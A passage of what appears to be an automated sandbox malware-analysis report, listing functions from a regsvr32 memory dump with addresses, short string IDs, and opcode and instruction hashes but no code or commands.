                                                                                                Function 00F433D4 Relevance: 2.8, Strings: 2, Instructions: 276COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Ip$2/
                                                                                                • API String ID: 0-2558650176
                                                                                                • Opcode ID: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
                                                                                                • Instruction ID: b5a47cb2e59661b22f298c541d60d5bd3a9092a160009b9b8a0a7cfa2b65c8b2
                                                                                                • Opcode Fuzzy Hash: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
                                                                                                • Instruction Fuzzy Hash: 26E1D371505B888FEBB8DF28CC99BEB7BA0FB44306F10561AD84ADE290DB745685CF41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F44214 Relevance: 2.8, Strings: 2, Instructions: 253COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID: h$j-`
                                                                                                • API String ID: 963392458-2572860821
                                                                                                • Opcode ID: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
                                                                                                • Instruction ID: 5be9a7e5a018486a9cf02e6452369461018c0c02cefe014cfdd936ec6ff932f0
                                                                                                • Opcode Fuzzy Hash: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
                                                                                                • Instruction Fuzzy Hash: 34C1E371904788CFDB6CDFA8C88A59DBBB1FB58308F20421DE916AB661DBB49845CF41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F56C70 Relevance: 2.7, Strings: 2, Instructions: 226COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #z$UP
                                                                                                • API String ID: 0-3609392360
                                                                                                • Opcode ID: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
                                                                                                • Instruction ID: 50e0122f9c7f0b9a8a03f642c96ec472783a4b3025a86f618b3b81521e1576da
                                                                                                • Opcode Fuzzy Hash: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
                                                                                                • Instruction Fuzzy Hash: 14A15571904609DBDF58CFA8E4CA49EBBB0FB64354F60411DE852E72A0CB789999CFC1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F694BC Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: )bkr$z~
                                                                                                • API String ID: 0-4035444816
                                                                                                • Opcode ID: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                                • Instruction ID: a844858728208cd21e062d430eef41309a47579b0def34a8fa652222236e5164
                                                                                                • Opcode Fuzzy Hash: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                                • Instruction Fuzzy Hash: 208190715187888FEBB8CF28CC867D937A4FB45314F648119D88ECA291DF785A49EB41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5EC30 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: aK>$NM
                                                                                                • API String ID: 0-1076587397
                                                                                                • Opcode ID: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                                • Instruction ID: 2450b7c736ed9741a6f4f0e0e887585eed24a6b24f6aaf854d8407cad665b801
                                                                                                • Opcode Fuzzy Hash: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                                • Instruction Fuzzy Hash: 78B144B590030DCFDB98CF28C18A58D7BB8FB55348F505129FC1E9A2A1E3B5E614CB56
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5662C Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: GcX$cy5X
                                                                                                • API String ID: 0-3427037236
                                                                                                • Opcode ID: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                                • Instruction ID: 005cfbe3aa9d0bcf600fe313ab5facbd9d10e91349f48c4e227c1f1e44746bed
                                                                                                • Opcode Fuzzy Hash: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                                • Instruction Fuzzy Hash: 4FA1D5B0548388CBEBBEDF34C88A6D93BA9FB54704F504619EC1E8E290DB745789DB41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4AC94 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: &$U
                                                                                                • API String ID: 0-326847644
                                                                                                • Opcode ID: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                                • Instruction ID: 744569086fc4e857d83195b2fe39dc0392d148723bcf64c9c454a5baee6ec25e
                                                                                                • Opcode Fuzzy Hash: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                                • Instruction Fuzzy Hash: 309169B590038E8FDF48CF68D88A5DE7BB0FB14348F104A19FC66AA250D7B4D665CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F55A00 Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: k' {$z5
                                                                                                • API String ID: 0-3484172565
                                                                                                • Opcode ID: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                                • Instruction ID: 58ed8a6320b1b5a37215d061fa39dea768bce17d2daa0cab01049e0a838e55e1
                                                                                                • Opcode Fuzzy Hash: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                                • Instruction Fuzzy Hash: D3710670500749CFDB48DF24C88A5DA7BA1FB58359F114329FD8AAB260D778D994CBC4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4AAB8 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 6$D
                                                                                                • API String ID: 0-3309211938
                                                                                                • Opcode ID: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                                • Instruction ID: 8abd46ab5c716f0c1193b73faa51760104f5450e471d3247e89c534628e2e1cf
                                                                                                • Opcode Fuzzy Hash: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                                • Instruction Fuzzy Hash: 7B5139705247899BDB98CF28DC899993BE4FB45308F90626CFD86C7292C778D886CB41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F47530 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #T$(Pv0
                                                                                                • API String ID: 0-2531358951
                                                                                                • Opcode ID: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                                • Instruction ID: 69a444e7a9732d9e7b0525a83a494644ecf42dabb901e085fcc75cc3de8651bc
                                                                                                • Opcode Fuzzy Hash: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                                • Instruction Fuzzy Hash: E0512D7050030E8BDF58DF24C88A5DE3FA0FB28398F251619EC4A96294D378D999CFC5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F53B14 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $$%9
                                                                                                • API String ID: 0-3031553271
                                                                                                • Opcode ID: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                                • Instruction ID: ddb64e9b2fc000161370315fa9e6ca65c208e2ab0631a3c3472ab67444f95e47
                                                                                                • Opcode Fuzzy Hash: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                                • Instruction Fuzzy Hash: BB415E7061C784ABD798CF1CC4D962ABAE1FBC4355F90592EF986C7391C738C9489B42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4B07C Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: gd$s=z
                                                                                                • API String ID: 0-3301279615
                                                                                                • Opcode ID: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                                • Instruction ID: fc1624ceb1801c1b8ba2e30c42e57d82880dfea1065d97e63a353184eb2e0eba
                                                                                                • Opcode Fuzzy Hash: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                                • Instruction Fuzzy Hash: E651E1B190030A8FDB48CF68D48A5DE7FB1FB68388F204219FC56A6250D37886A4CFD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F46138 Relevance: 2.6, Strings: 2, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: !oW!$ke&Q
                                                                                                • API String ID: 0-419570616
                                                                                                • Opcode ID: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                                • Instruction ID: a85cb7c4c3816d5d9881c9b229cd75642f39a765d358198eb8f6b6e20a8a7575
                                                                                                • Opcode Fuzzy Hash: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                                • Instruction Fuzzy Hash: 2851D7B090074E8FDB48CF68C88A5DE7FB0FB68398F114619EC55A6290D7B496A5CFD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F44758 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ?j|$P
                                                                                                • API String ID: 0-615948335
                                                                                                • Opcode ID: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                                • Instruction ID: 54af719df94cd1004c00c0992901a7b409640683cfed8521277752c6c06ac73b
                                                                                                • Opcode Fuzzy Hash: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                                • Instruction Fuzzy Hash: DF41D3B090034A8FDB48CF64C48A5DE7FB1FB68388F50461DE816A6390D77896A4CFD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F55880 Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$aI
                                                                                                • API String ID: 0-3604358270
                                                                                                • Opcode ID: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                                • Instruction ID: 89885a7f0ea6e34192c17b1e4d5a56b0bcb38eba5252283cfcfdb926a6f01253
                                                                                                • Opcode Fuzzy Hash: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                                • Instruction Fuzzy Hash: 3741C6B190038A8BCB48DF64C99A5DE7BB1FB48358F114A2DF86697350D3B49664CF84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F58A2C Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: j$[
                                                                                                • API String ID: 0-3696242357
                                                                                                • Opcode ID: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                                • Instruction ID: 51319176227fe189211dc97a68349c8ea8d43089282181feacd9770dc1314f70
                                                                                                • Opcode Fuzzy Hash: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                                • Instruction Fuzzy Hash: B241D5B090074E8BDB48DF64C48A5DE7FB1FB58398F11861DE856A6290D3B4D6A4CFC1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5C058 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: + $S"
                                                                                                • API String ID: 0-2880694137
                                                                                                • Opcode ID: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                                • Instruction ID: d53249c5aec74aaae67b91d0133c93c8e90d7a7d6d5a5bddf2f0ccdb9a54e6d8
                                                                                                • Opcode Fuzzy Hash: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                                • Instruction Fuzzy Hash: F451B6B090078E8FDF88DF64C88A5DE7BB0FB58354F10461DE866A6250D3B8D665CF85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5B130 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: =K$d%
                                                                                                • API String ID: 0-2790768846
                                                                                                • Opcode ID: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                                • Instruction ID: b96188b3b354e3d9ff7c6d4fd229b80d2b7a4e47d4225455cd2d0885f328acbe
                                                                                                • Opcode Fuzzy Hash: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                                • Instruction Fuzzy Hash: F841E4B090074E8BDF48CF64C88A5DE7FF0FB58358F104A1DE86AA6250D3B89665CF85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F495BC Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #|$`
                                                                                                • API String ID: 0-1687004633
                                                                                                • Opcode ID: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                                • Instruction ID: 871168e52915af456c52feabdf5f3932238cf700321dac83cb1a8865442d0da3
                                                                                                • Opcode Fuzzy Hash: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                                • Instruction Fuzzy Hash: E641D5B190078E8FDF88CF68C88A4DE7BF0FB58358F014619F856A6250D3B89665CF85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5C44C Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: c$j~;
                                                                                                • API String ID: 0-3832213246
                                                                                                • Opcode ID: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                                • Instruction ID: 573eb8d44931a6d2c45096819a89464516f796e4507ca73b86cca08e416dcd54
                                                                                                • Opcode Fuzzy Hash: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                                • Instruction Fuzzy Hash: E941A5B080078E8FDB88DF64C88A1DF7BB0FB54358F104A19EC66A6250D3B89661CFD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F47C08 Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: -h$W
                                                                                                • API String ID: 0-4146498651
                                                                                                • Opcode ID: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                                • Instruction ID: f88557447342bb8f1509c4b38bb67a2c904d8a33c50db15995025d19bed1c1c6
                                                                                                • Opcode Fuzzy Hash: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                                • Instruction Fuzzy Hash: AE41B4B590038E9FDB44CF68D88A5CE7FF0FB48358F114619F869A6250D3B49664CF85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F68A00 Relevance: 2.6, Strings: 2, Instructions: 81COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .$fp
                                                                                                • API String ID: 0-3298127435
                                                                                                • Opcode ID: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                                • Instruction ID: 23804cbe39bbfc70a2e65fb934bdbe48d0393d975391d1e9042b498201f7f324
                                                                                                • Opcode Fuzzy Hash: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                                • Instruction Fuzzy Hash: EE41F4B190470E8BDB88CF64C48A4DE7FB0FB28398F114619E856A6290D3B89665CFC4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F48FB0 Relevance: 2.6, Strings: 2, Instructions: 79COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "$Zs
                                                                                                • API String ID: 0-3922668666
                                                                                                • Opcode ID: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                                • Instruction ID: f1d62621bd08a38fa15a490595be93b85bae5397fb0987493b8f1264ce03d9fe
                                                                                                • Opcode Fuzzy Hash: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                                • Instruction Fuzzy Hash: 803192B0529380ABC388DF28D19A91EBBE1FBD5708F806A1DF8C286390D374D406CB43
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F47840 Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: XW$s [
                                                                                                • API String ID: 0-2366283936
                                                                                                • Opcode ID: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                                • Instruction ID: c8620a86b0501fca327921337904d07bbca0ac58b79dbc40019122cd377fd21c
                                                                                                • Opcode Fuzzy Hash: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                                • Instruction Fuzzy Hash: 623190B190478E8FDF48DF28D88949A3BE1FB48304B004A1DFC6AD7250D7B4D665CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F44C84 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4V$jn(
                                                                                                • API String ID: 0-2529302498
                                                                                                • Opcode ID: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                                • Instruction ID: cb5d544f3b4b9f04c9dfd671481ec3bad593690e5eb4dddf862df6e3aa1dae86
                                                                                                • Opcode Fuzzy Hash: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                                • Instruction Fuzzy Hash: 17317EB1529381AFC398CF28C48A91ABBE0FBC9318F806A1DF8C686260D774D555CB02
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4F65C Relevance: 2.6, Strings: 2, Instructions: 69COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: '$%6
                                                                                                • API String ID: 0-1852427169
                                                                                                • Opcode ID: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                                • Instruction ID: 05249663a0179330ad45d21934dcfd5c9628912d79576b4f5c22a08ed84997fc
                                                                                                • Opcode Fuzzy Hash: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                                • Instruction Fuzzy Hash: CD316FB5568381ABD388DF28C48A81ABBF1FB89308F806A1DF8C6DB251D775D545CB43
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F48A8C Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
